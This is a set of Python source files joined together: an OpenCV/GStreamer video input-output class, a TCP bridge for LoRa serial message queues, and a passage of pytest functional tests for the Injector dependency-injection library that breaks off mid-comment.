videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False
class Protocol(Enum):
FILE = 0
CSI = 1
V4L2 = 2
RTSP = 3
class VideoIO:
"""
Class for video capturing from video files or cameras, and writing video files.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.camera_size = config['camera_size']
self.camera_fps = config['camera_fps']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
if WITH_GSTREAMER:
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.cap = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.fps = self.cap.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.fps == 0:
self.fps = self.camera_fps # fallback
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.fps)
if self.protocol == Protocol.FILE:
self.capture_dt = 1 / self.fps
else:
            # for live cameras, cap the capture rate at the estimated processing speed
self.capture_dt = 1 / min(self.fps, proc_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.capture_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=(int)%d, height=(int)%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.FILE:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, '
'format=(string)NV12, framerate=(fraction)%d/1 ! '
% (
self.input_uri[6:],
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=(int)%d, height=(int)%d, '
'format=(string)YUY2, framerate=(fraction)%d/1 ! '
% (
self.input_uri,
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for video file
if self.protocol == Protocol.FILE:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
pos = uri.find('://')
if '/dev/video' in uri:
protocol = Protocol.V4L2
elif uri[:pos] == 'csi':
protocol = Protocol.CSI
elif uri[:pos] == 'rtsp':
protocol = Protocol.RTSP
else:
protocol = Protocol.FILE
return protocol
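# --- Usage sketch (not part of the original module) -------------------------------
# VideoIO hides capture, frame buffering, and optional encoding behind one object.
# The config keys below mirror the ones read in __init__; the input/output paths
# are placeholders.
if __name__ == '__main__':
    config = {
        'camera_size': (1280, 720),  # used by the CSI/V4L2 capture pipelines
        'camera_fps': 30,
        'buffer_size': 10,
    }
    stream = VideoIO((1280, 720), config, 'input.mp4', output_uri='out/result.mp4')
    stream.start_capture()
    try:
        while True:
            frame = stream.read()
            if frame is None:
                break
            stream.write(frame)  # pass-through copy; frame processing would go here
    finally:
        stream.release()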
|
local_network.py
|
import socket
import threading
import time
from queue import Queue
from lora_multihop import serial_connection
class LocalNetwork:
def __init__(self, port, module_address, host=None):
self.host = host
self.port = port
self.module_address = module_address
self.send_queue = Queue()
self.send_queue_second_client = Queue()
self.sending_queue_inserter_thread = None
self.server_socket_thread = None
self.tcp_communication_running = False
self.socket = None
self.connection_list = []
def start_send_receive_threads(self, is_server=True):
self.tcp_communication_running = True
sending_thread = threading.Thread(target=self.start_sending)
sending_thread.start()
if is_server:
connection_listener_thread = threading.Thread(target=self.waiting_for_connections)
connection_listener_thread.start()
else:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.host, self.port))
self.socket.setblocking(False)
self.connection_list.append(self.socket)
t = threading.Thread(target=self.start_receiving, args=(self.socket,))
t.start()
def waiting_for_connections(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setblocking(False)
self.socket.bind(("", self.port))
self.socket.listen(2)
while self.tcp_communication_running:
try:
conn, addr = self.socket.accept()
conn.setblocking(False)
self.connection_list.append(conn)
t = threading.Thread(target=self.start_receiving, args=(conn,))
t.start()
except socket.error:
pass
print('stop waiting for incoming connections')
def start_receiving(self, connection):
while self.tcp_communication_running:
try:
data = connection.recv(1024)
if data:
print(f'data: {data}')
serial_connection.response_q.put(data.decode())
except socket.error:
time.sleep(0.2)
print('receiving thread stopped')
def start_sending(self):
while self.tcp_communication_running:
while not serial_connection.writing_q.empty():
payload = serial_connection.writing_q.get()[0]
if 'AT' not in payload:
message_to_send = serial_connection.str_to_bytes(f'LR,{self.module_address},10,'+ payload)
for connection in self.connection_list:
connection.send(message_to_send)
serial_connection.status_q.put(True)
time.sleep(0.5)
print('sending thread stopped')
def stop_local_consumer_producer(self):
self.tcp_communication_running = False
self.socket.close()
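# --- Usage sketch (not part of the original module) -------------------------------
# LocalNetwork bridges the lora_multihop serial queues to TCP: payloads popped from
# serial_connection.writing_q are framed as 'LR,<module_address>,10,<payload>' and
# sent to every connected peer, while received bytes are pushed onto
# serial_connection.response_q. Host, port, and module addresses below are
# placeholders.
if __name__ == '__main__':
    # server side: listens on the port and accepts up to two clients
    server = LocalNetwork(port=5000, module_address='0130')
    server.start_send_receive_threads(is_server=True)
    # a client on another machine would instead connect with:
    # client = LocalNetwork(port=5000, module_address='0131', host='192.168.0.10')
    # client.start_send_receive_threads(is_server=False)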
|
injector_test.py
|
# encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <[email protected]>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, Dict, List, NewType
import abc
import sys
import threading
import traceback
import warnings
import pytest
from injector import (
Binder,
CallError,
Injector,
Scope,
InstanceProvider,
ClassProvider,
get_bindings,
inject,
multiprovider,
noninjectable,
singleton,
threadlocal,
UnsatisfiedRequirement,
CircularDependency,
Module,
SingletonScope,
ScopeDecorator,
AssistedBuilder,
provider,
ProviderOf,
ClassAssistedBuilder,
Error,
UnknownArgument,
HAVE_ANNOTATED,
)
if HAVE_ANNOTATED:
from injector import Inject, NoInject
class EmptyClass:
pass
class DependsOnEmptyClass:
@inject
def __init__(self, b: EmptyClass):
"""Construct a new DependsOnEmptyClass."""
self.b = b
def prepare_nested_injectors():
def configure(binder):
binder.bind(str, to='asd')
parent = Injector(configure)
child = parent.create_child_injector()
return parent, child
def check_exception_contains_stuff(exception, stuff):
stringified = str(exception)
for thing in stuff:
assert thing in stringified, '%r should be present in the exception representation: %s' % (
thing,
stringified,
)
def test_child_injector_inherits_parent_bindings():
parent, child = prepare_nested_injectors()
assert child.get(str) == parent.get(str)
def test_child_injector_overrides_parent_bindings():
parent, child = prepare_nested_injectors()
child.binder.bind(str, to='qwe')
assert (parent.get(str), child.get(str)) == ('asd', 'qwe')
def test_child_injector_rebinds_arguments_for_parent_scope():
class Cls:
val = ""
class A(Cls):
@inject
def __init__(self, val: str):
self.val = val
def configure_parent(binder):
binder.bind(Cls, to=A)
binder.bind(str, to="Parent")
def configure_child(binder):
binder.bind(str, to="Child")
parent = Injector(configure_parent)
assert parent.get(Cls).val == "Parent"
child = parent.create_child_injector(configure_child)
assert child.get(Cls).val == "Child"
def test_scopes_are_only_bound_to_root_injector():
parent, child = prepare_nested_injectors()
class A:
pass
parent.binder.bind(A, to=A, scope=singleton)
assert parent.get(A) is child.get(A)
def test_get_default_injected_instances():
def configure(binder):
binder.bind(DependsOnEmptyClass)
binder.bind(EmptyClass)
injector = Injector(configure)
assert injector.get(Injector) is injector
assert injector.get(Binder) is injector.binder
def test_instantiate_injected_method():
a = DependsOnEmptyClass('Bob')
assert a.b == 'Bob'
def test_method_decorator_is_wrapped():
assert DependsOnEmptyClass.__init__.__doc__ == 'Construct a new DependsOnEmptyClass.'
assert DependsOnEmptyClass.__init__.__name__ == '__init__'
def test_decorator_works_for_function_with_no_args():
@inject
def wrapped(*args, **kwargs):
pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
def configure(binder):
binder.bind(int, to=lambda: 1 / 0)
class A:
@inject
def __init__(self, i: int):
pass
injector = Injector(configure)
builder = injector.get(AssistedBuilder[A])
with pytest.raises(ZeroDivisionError):
builder.build()
builder.build(i=3)
def test_inject_direct():
def configure(binder):
binder.bind(DependsOnEmptyClass)
binder.bind(EmptyClass)
injector = Injector(configure)
a = injector.get(DependsOnEmptyClass)
assert isinstance(a, DependsOnEmptyClass)
assert isinstance(a.b, EmptyClass)
def test_configure_multiple_modules():
def configure_a(binder):
binder.bind(DependsOnEmptyClass)
def configure_b(binder):
binder.bind(EmptyClass)
injector = Injector([configure_a, configure_b])
a = injector.get(DependsOnEmptyClass)
assert isinstance(a, DependsOnEmptyClass)
assert isinstance(a.b, EmptyClass)
def test_inject_with_missing_dependency():
def configure(binder):
binder.bind(DependsOnEmptyClass)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(EmptyClass)
def test_inject_named_interface():
class A:
@inject
def __init__(self, b: EmptyClass):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(EmptyClass)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, EmptyClass)
class TransitiveC:
pass
class TransitiveB:
@inject
def __init__(self, c: TransitiveC):
self.c = c
class TransitiveA:
@inject
def __init__(self, b: TransitiveB):
self.b = b
def test_transitive_injection():
def configure(binder):
binder.bind(TransitiveA)
binder.bind(TransitiveB)
binder.bind(TransitiveC)
injector = Injector(configure)
a = injector.get(TransitiveA)
assert isinstance(a, TransitiveA)
assert isinstance(a.b, TransitiveB)
assert isinstance(a.b.c, TransitiveC)
def test_transitive_injection_with_missing_dependency():
def configure(binder):
binder.bind(TransitiveA)
binder.bind(TransitiveB)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(TransitiveA)
with pytest.raises(UnsatisfiedRequirement):
injector.get(TransitiveB)
def test_inject_singleton():
class A:
@inject
def __init__(self, b: EmptyClass):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(EmptyClass, scope=SingletonScope)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
@singleton
class SingletonB:
pass
def test_inject_decorated_singleton_class():
class A:
@inject
def __init__(self, b: SingletonB):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(SingletonB)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
def test_threadlocal():
@threadlocal
class A:
def __init__(self):
pass
def configure(binder):
binder.bind(A)
injector = Injector(configure)
a1 = injector.get(A)
a2 = injector.get(A)
assert a1 is a2
a3 = [None]
ready = threading.Event()
def inject_a3():
a3[0] = injector.get(A)
ready.set()
threading.Thread(target=inject_a3).start()
ready.wait(1.0)
assert a2 is not a3[0] and a3[0] is not None
class Interface2:
pass
def test_injecting_interface_implementation():
class Implementation:
pass
class A:
@inject
def __init__(self, i: Interface2):
self.i = i
def configure(binder):
binder.bind(A)
binder.bind(Interface2, to=Implementation)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a.i, Implementation)
class CyclicInterface:
pass
class CyclicA:
@inject
def __init__(self, i: CyclicInterface):
self.i = i
class CyclicB:
@inject
def __init__(self, a: CyclicA):
self.a = a
def test_cyclic_dependencies():
def configure(binder):
binder.bind(CyclicInterface, to=CyclicB)
binder.bind(CyclicA)
injector = Injector(configure)
with pytest.raises(CircularDependency):
injector.get(CyclicA)
class CyclicInterface2:
pass
class CyclicA2:
@inject
def __init__(self, i: CyclicInterface2):
self.i = i
class CyclicB2:
@inject
def __init__(self, a_builder: AssistedBuilder[CyclicA2]):
self.a = a_builder.build(i=self)
def test_dependency_cycle_can_be_worked_broken_by_assisted_building():
def configure(binder):
binder.bind(CyclicInterface2, to=CyclicB2)
binder.bind(CyclicA2)
injector = Injector(configure)
# Previously it'd detect a circular dependency here:
# 1. Constructing CyclicA2 requires CyclicInterface2 (bound to CyclicB2)
# 2. Constructing CyclicB2 requires assisted build of CyclicA2
# 3. Constructing CyclicA2 triggers circular dependency check
assert isinstance(injector.get(CyclicA2), CyclicA2)
class Interface5:
constructed = False
def __init__(self):
Interface5.constructed = True
def test_that_injection_is_lazy():
class A:
@inject
def __init__(self, i: Interface5):
self.i = i
def configure(binder):
binder.bind(Interface5)
binder.bind(A)
injector = Injector(configure)
assert not (Interface5.constructed)
injector.get(A)
assert Interface5.constructed
def test_module_provider():
class MyModule(Module):
@provider
def provide_name(self) -> str:
return 'Bob'
module = MyModule()
injector = Injector(module)
assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
name = 'Meg'
class MyModule(Module):
def configure(self, binder):
binder.bind(str, to=name)
injector = Injector(MyModule)
assert injector.get(str) == name
def test_inject_and_provide_coexist_happily():
class MyModule(Module):
@provider
def provide_weight(self) -> float:
return 50.0
@provider
def provide_age(self) -> int:
return 25
# TODO(alec) Make provider/inject order independent.
@provider
@inject
def provide_description(self, age: int, weight: float) -> str:
return 'Bob is %d and weighs %0.1fkg' % (age, weight)
assert Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg'
Names = NewType('Names', List[str])
Passwords = NewType('Passwords', Dict[str, str])
def test_multibind():
# First let's have some explicit multibindings
def configure(binder):
binder.multibind(List[str], to=['not a name'])
binder.multibind(Dict[str, str], to={'asd': 'qwe'})
# To make sure Lists and Dicts of different subtypes are treated distinctly
binder.multibind(List[int], to=[1, 2, 3])
binder.multibind(Dict[str, int], to={'weight': 12})
# To see that NewTypes are treated distinctly
binder.multibind(Names, to=['Bob'])
binder.multibind(Passwords, to={'Bob': 'password1'})
# Then @multiprovider-decorated Module methods
class CustomModule(Module):
@multiprovider
def provide_some_ints(self) -> List[int]:
return [4, 5, 6]
@multiprovider
def provide_some_strs(self) -> List[str]:
return ['not a name either']
@multiprovider
def provide_str_to_str_mapping(self) -> Dict[str, str]:
return {'xxx': 'yyy'}
@multiprovider
def provide_str_to_int_mapping(self) -> Dict[str, int]:
return {'height': 33}
@multiprovider
def provide_names(self) -> Names:
return ['Alice', 'Clarice']
@multiprovider
def provide_passwords(self) -> Passwords:
return {'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
injector = Injector([configure, CustomModule])
assert injector.get(List[str]) == ['not a name', 'not a name either']
assert injector.get(List[int]) == [1, 2, 3, 4, 5, 6]
assert injector.get(Dict[str, str]) == {'asd': 'qwe', 'xxx': 'yyy'}
assert injector.get(Dict[str, int]) == {'weight': 12, 'height': 33}
assert injector.get(Names) == ['Bob', 'Alice', 'Clarice']
assert injector.get(Passwords) == {'Bob': 'password1', 'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
def test_regular_bind_and_provider_dont_work_with_multibind():
# We only want multibind and multiprovider to work to avoid confusion
Names = NewType('Names', List[str])
Passwords = NewType('Passwords', Dict[str, str])
class MyModule(Module):
with pytest.raises(Error):
@provider
def provide_strs(self) -> List[str]:
return []
with pytest.raises(Error):
@provider
def provide_names(self) -> Names:
return []
with pytest.raises(Error):
@provider
def provide_strs_in_dict(self) -> Dict[str, str]:
return {}
with pytest.raises(Error):
@provider
def provide_passwords(self) -> Passwords:
return {}
injector = Injector()
binder = injector.binder
with pytest.raises(Error):
binder.bind(List[str], to=[])
with pytest.raises(Error):
binder.bind(Names, to=[])
with pytest.raises(Error):
binder.bind(Dict[str, str], to={})
with pytest.raises(Error):
binder.bind(Passwords, to={})
def test_auto_bind():
class A:
pass
injector = Injector()
assert isinstance(injector.get(A), A)
def test_auto_bind_with_newtype():
# Reported in https://github.com/alecthomas/injector/issues/117
class A:
pass
AliasOfA = NewType('AliasOfA', A)
injector = Injector()
assert isinstance(injector.get(AliasOfA), A)
class Request:
pass
class RequestScope(Scope):
def configure(self):
self.context = None
@contextmanager
def __call__(self, request):
assert self.context is None
self.context = {}
binder = self.injector.get(Binder)
binder.bind(Request, to=request, scope=RequestScope)
yield
self.context = None
def get(self, key, provider):
if self.context is None:
raise UnsatisfiedRequirement(None, key)
try:
return self.context[key]
except KeyError:
provider = InstanceProvider(provider.get(self.injector))
self.context[key] = provider
return provider
request = ScopeDecorator(RequestScope)
@request
class Handler:
def __init__(self, request):
self.request = request
class RequestModule(Module):
@provider
@inject
def handler(self, request: Request) -> Handler:
return Handler(request)
def test_custom_scope():
injector = Injector([RequestModule()], auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
scope = injector.get(RequestScope)
request = Request()
with scope(request):
handler = injector.get(Handler)
assert handler.request is request
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
def test_binder_install():
class ModuleA(Module):
def configure(self, binder):
binder.bind(str, to='hello world')
class ModuleB(Module):
def configure(self, binder):
binder.install(ModuleA())
injector = Injector([ModuleB()])
assert injector.get(str) == 'hello world'
def test_binder_provider_for_method_with_explicit_provider():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=InstanceProvider(1))
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_instance():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=1)
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_class():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int)
assert type(provider) is ClassProvider
assert provider.get(injector) == 0
def test_binder_provider_for_method_with_class_to_specific_subclass():
class A:
pass
class B(A):
pass
injector = Injector()
binder = injector.binder
provider = binder.provider_for(A, B)
assert type(provider) is ClassProvider
assert isinstance(provider.get(injector), B)
def test_binder_provider_for_type_with_metaclass():
    # create the class with a metaclass in a Python 2/3-compatible way;
    # the Python 3-only equivalent would be:
    #     class A(object, metaclass=abc.ABCMeta):
    #         pass
A = abc.ABCMeta('A', (object,), {})
injector = Injector()
binder = injector.binder
assert isinstance(binder.provider_for(A, None).get(injector), A)
class ClassA:
def __init__(self, parameter):
pass
class ClassB:
@inject
def __init__(self, a: ClassA):
pass
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
injector = Injector()
try:
injector.get(ClassB)
except CallError as ce:
check_exception_contains_stuff(ce, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
class A:
def __init__(self):
max()
injector = Injector()
with pytest.raises(TypeError):
injector.get(A)
def test_call_error_str_representation_handles_single_arg():
ce = CallError('zxc')
assert str(ce) == 'zxc'
class NeedsAssistance:
@inject
def __init__(self, a: str, b):
self.a = a
self.b = b
def test_assisted_builder_works_when_got_directly_from_injector():
injector = Injector()
builder = injector.get(AssistedBuilder[NeedsAssistance])
obj = builder.build(b=123)
assert (obj.a, obj.b) == (str(), 123)
def test_assisted_builder_works_when_injected():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.obj = builder.build(b=234)
injector = Injector()
x = injector.get(X)
assert (x.obj.a, x.obj.b) == (str(), 234)
class Interface:
b = 0
def test_assisted_builder_uses_bindings():
def configure(binder):
binder.bind(Interface, to=NeedsAssistance)
injector = Injector(configure)
builder = injector.get(AssistedBuilder[Interface])
x = builder.build(b=333)
assert (type(x), x.b) == (NeedsAssistance, 333)
def test_assisted_builder_uses_concrete_class_when_specified():
class X:
pass
def configure(binder):
# meant only to show that provider isn't called
binder.bind(X, to=lambda: 1 / 0)
injector = Injector(configure)
builder = injector.get(ClassAssistedBuilder[X])
builder.build()
def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.builder = builder
i1, i2 = Injector(), Injector()
b1 = i1.get(X).builder
b2 = i2.get(X).builder
assert (b1._injector, b2._injector) == (i1, i2)
class TestThreadSafety:
def setup(self):
self.event = threading.Event()
def configure(binder):
binder.bind(str, to=lambda: self.event.wait() and 'this is str')
class XXX:
@inject
def __init__(self, s: str):
pass
self.injector = Injector(configure)
self.cls = XXX
def gather_results(self, count):
objects = []
lock = threading.Lock()
def target():
o = self.injector.get(self.cls)
with lock:
objects.append(o)
threads = [threading.Thread(target=target) for i in range(count)]
for t in threads:
t.start()
self.event.set()
for t in threads:
t.join()
return objects
def test_injection_is_thread_safe(self):
objects = self.gather_results(2)
assert len(objects) == 2
def test_singleton_scope_is_thread_safe(self):
self.injector.binder.bind(self.cls, scope=singleton)
a, b = self.gather_results(2)
assert a is b
def test_provider_and_scope_decorator_collaboration():
@provider
@singleton
def provider_singleton() -> int:
return 10
@singleton
@provider
def singleton_provider() -> int:
return 10
assert provider_singleton.__binding__.scope == SingletonScope
assert singleton_provider.__binding__.scope == SingletonScope
def test_injecting_into_method_of_object_that_is_falseish_works():
# regression test
class X(dict):
@inject
def __init__(self, s: str):
pass
injector = Injector()
injector.get(X)
Name = NewType("Name", str)
Message = NewType("Message", str)
def test_callable_provider_injection():
@inject
def create_message(name: Name):
return "Hello, " + name
def configure(binder):
binder.bind(Name, to="John")
binder.bind(Message, to=create_message)
injector = Injector([configure])
msg = injector.get(Message)
assert msg == "Hello, John"
def test_providerof():
counter = [0]
def provide_str():
counter[0] += 1
return 'content'
def configure(binder):
binder.bind(str, to=provide_str)
injector = Injector(configure)
assert counter[0] == 0
provider = injector.get(ProviderOf[str])
assert counter[0] == 0
assert provider.get() == 'content'
assert counter[0] == 1
assert provider.get() == injector.get(str)
assert counter[0] == 3
def test_providerof_cannot_be_bound():
def configure(binder):
binder.bind(ProviderOf[int], to=InstanceProvider(None))
with pytest.raises(Exception):
Injector(configure)
def test_providerof_is_safe_to_use_with_multiple_injectors():
def configure1(binder):
binder.bind(int, to=1)
def configure2(binder):
binder.bind(int, to=2)
injector1 = Injector(configure1)
injector2 = Injector(configure2)
provider_of = ProviderOf[int]
provider1 = injector1.get(provider_of)
provider2 = injector2.get(provider_of)
assert provider1.get() == 1
assert provider2.get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
class InjectMe:
pass
def configure(binder):
binder.bind(InjectMe, to=InstanceProvider(InjectMe()))
injector = Injector(configure, auto_bind=False)
# This line used to fail with:
# Traceback (most recent call last):
# File "/projects/injector/injector_test.py", line 1171,
# in test_auto_bind_disabled_regressions
# injector.get(ProviderOf(InjectMe))
# File "/projects/injector/injector.py", line 687, in get
# binding = self.binder.get_binding(None, key)
# File "/projects/injector/injector.py", line 459, in get_binding
# raise UnsatisfiedRequirement(cls, key)
# UnsatisfiedRequirement: unsatisfied requirement on
# <injector.ProviderOf object at 0x10ff01550>
injector.get(ProviderOf[InjectMe])
# This used to fail with an error similar to the ProviderOf one
injector.get(ClassAssistedBuilder[InjectMe])
def test_binding_an_instance_regression():
text = b'hello'.decode()
def configure(binder):
# Yes, this binding doesn't make sense strictly speaking but
# it's just a sample case.
binder.bind(bytes, to=text)
injector = Injector(configure)
# This used to return empty bytes instead of the expected string
assert injector.get(bytes) == text
class PartialB:
@inject
def __init__(self, a: EmptyClass, b: str):
self.a = a
self.b = b
def test_class_assisted_builder_of_partially_injected_class_old():
class C:
@inject
def __init__(self, a: EmptyClass, builder: ClassAssistedBuilder[PartialB]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, PartialB)
assert isinstance(c.b.a, EmptyClass)
class ImplicitA:
pass
class ImplicitB:
@inject
def __init__(self, a: ImplicitA):
self.a = a
class ImplicitC:
@inject
def __init__(self, b: ImplicitB):
self.b = b
def test_implicit_injection_for_python3():
injector = Injector()
c = injector.get(ImplicitC)
assert isinstance(c, ImplicitC)
assert isinstance(c.b, ImplicitB)
assert isinstance(c.b.a, ImplicitA)
def test_annotation_based_injection_works_in_provider_methods():
class MyModule(Module):
def configure(self, binder):
binder.bind(int, to=42)
@provider
def provide_str(self, i: int) -> str:
return str(i)
@singleton
@provider
def provide_object(self) -> object:
return object()
injector = Injector(MyModule)
assert injector.get(str) == '42'
assert injector.get(object) is injector.get(object)
class Fetcher:
def fetch(self, user_id):
assert user_id == 333
return {'name': 'John'}
class Processor:
@noninjectable('provider_id')
@inject
@noninjectable('user_id')
def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
assert provider_id == 'not injected'
data = fetcher.fetch(user_id)
self.name = data['name']
def test_assisted_building_is_supported():
def configure(binder):
binder.bind(int, to=897)
binder.bind(str, to='injected')
injector = Injector(configure)
processor_builder = injector.get(AssistedBuilder[Processor])
with pytest.raises(CallError):
processor_builder.build()
processor = processor_builder.build(user_id=333, provider_id='not injected')
assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
with pytest.raises(UnknownArgument):
class A:
@inject
@noninjectable('c')
def __init__(self, b: str):
self.b = b
def test_can_create_instance_with_untyped_noninjectable_argument():
class Parent:
@inject
@noninjectable('child1', 'child2')
def __init__(self, child1, *, child2):
self.child1 = child1
self.child2 = child2
injector = Injector()
parent_builder = injector.get(AssistedBuilder[Parent])
parent = parent_builder.build(child1='injected1', child2='injected2')
assert parent.child1 == 'injected1'
assert parent.child2 == 'injected2'
def test_implicit_injection_fails_when_annotations_are_missing():
class A:
def __init__(self, n):
self.n = n
injector = Injector()
with pytest.raises(CallError):
injector.get(A)
def test_injection_works_in_presence_of_return_value_annotation():
# Code with PEP 484-compatible type hints will have __init__ methods
# annotated as returning None[1] and this didn't work well with Injector.
#
# [1] https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
class A:
@inject
def __init__(self, s: str) -> None:
self.s = s
def configure(binder):
binder.bind(str, to='this is string')
injector = Injector([configure])
# Used to fail with:
# injector.UnknownProvider: couldn't determine provider for None to None
a = injector.get(A)
# Just a sanity check, if the code above worked we're almost certain
# we're good but just in case the return value annotation handling changed
# something:
assert a.s == 'this is string'
def test_things_dont_break_in_presence_of_args_or_kwargs():
class A:
@inject
def __init__(self, s: str, *args: int, **kwargs: str):
assert not args
assert not kwargs
injector = Injector()
# The following line used to fail with something like this:
# Traceback (most recent call last):
# File "/ve/injector/injector_test_py3.py", line 192,
# in test_things_dont_break_in_presence_of_args_or_kwargs
# injector.get(A)
# File "/ve/injector/injector.py", line 707, in get
# result = scope_instance.get(key, binding.provider).get(self)
# File "/ve/injector/injector.py", line 142, in get
# return injector.create_object(self._cls)
# File "/ve/injector/injector.py", line 744, in create_object
# init(instance, **additional_kwargs)
# File "/ve/injector/injector.py", line 1082, in inject
# kwargs=kwargs
